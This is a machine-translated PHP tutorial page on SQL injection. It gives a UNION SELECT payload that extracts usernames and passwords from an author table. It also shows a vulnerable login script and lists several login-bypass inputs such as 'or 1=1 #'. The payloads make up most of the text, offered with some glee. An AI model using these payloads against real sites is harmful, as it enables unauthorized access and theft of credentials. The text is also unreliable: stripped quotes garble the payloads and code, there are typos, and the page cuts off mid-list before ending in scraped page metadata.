php injection 2_PHP tutorial

Let’s build the injection statement
Enter
a% and 1=2 union select 1,username,3,4,5,6,7,8, password,10,11 from
alphaauthor# in the input box Put it in the sql statement and become
select * from alphadb where title like %a% and 1=2 union select
1,username,3,4,5,6,7,8, password,10,11 from alphaauthor# %
The result is as shown in Figure 17.
How about it, it’s out, haha, everything is under control.
C: Let’s take a look at various injection attack methods from the injection location
1) First let’s take a look at the background login
Code first
//login.php
.. .....
$query="select * from alphaauthor where UserName= "
.$HTTP_POST_VARS["UserName"]." and
Password= ". $HTTP_POST_VARS["Password"]." ";
$result=mysql_query($query);
$data=mysql_fetch_array($result);
if ($data)
{
echo "Backend login successful";
}
esle
{
echo "log in again";
exit;
｝
.........
?>
Username and password are directly put into SQL for execution without any processing.
Let’s see how we can get around it?
The most classic one is still the one:
Enter
'or =
into both the username and password boxes and bring it into the sql statement to become
select * from alphaauthor where UserName= or = and Password = or =
The $data obtained in this way must be true, which means we have successfully logged in.
There are other bypass methods, the principle is the same, just find a way to make $data return true.
We can use the following methods
1.
Enter both username and password or a = a
Sql becomes
select * from alphaauthor where UserName= or a = a and Password=
or a = a
2.
Enter both username and password or 1=1 and ' =
Sql becomes
select * from alphaauthor where UserName= or 1=1 and ' =
and Password= or 1=1 and ' =
Enter both username and password or 2>1 and ' =
Sql becomes
select * from alphaauthor where UserName= or 2>1 and ' =
and Password= or 2>1 and ' =
3.
Username input or 1=1 # Enter the password as you like
Sql becomes
select * from alphaauthor where UserName = or 1＝1 # and
Password= anything The following part of
is commented out, of course the return is still true.
4.

http://www.bkjia.com/PHPjc/631789.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/631789.htmlTechArticleLet’s build the injection statement. Enter a% and 1=2 union select 1,username,3,4 in the input box. ,5,6,7,8, password,10,11 from alphaauthor# Put it in the sql statement and become select * from alphadb where t...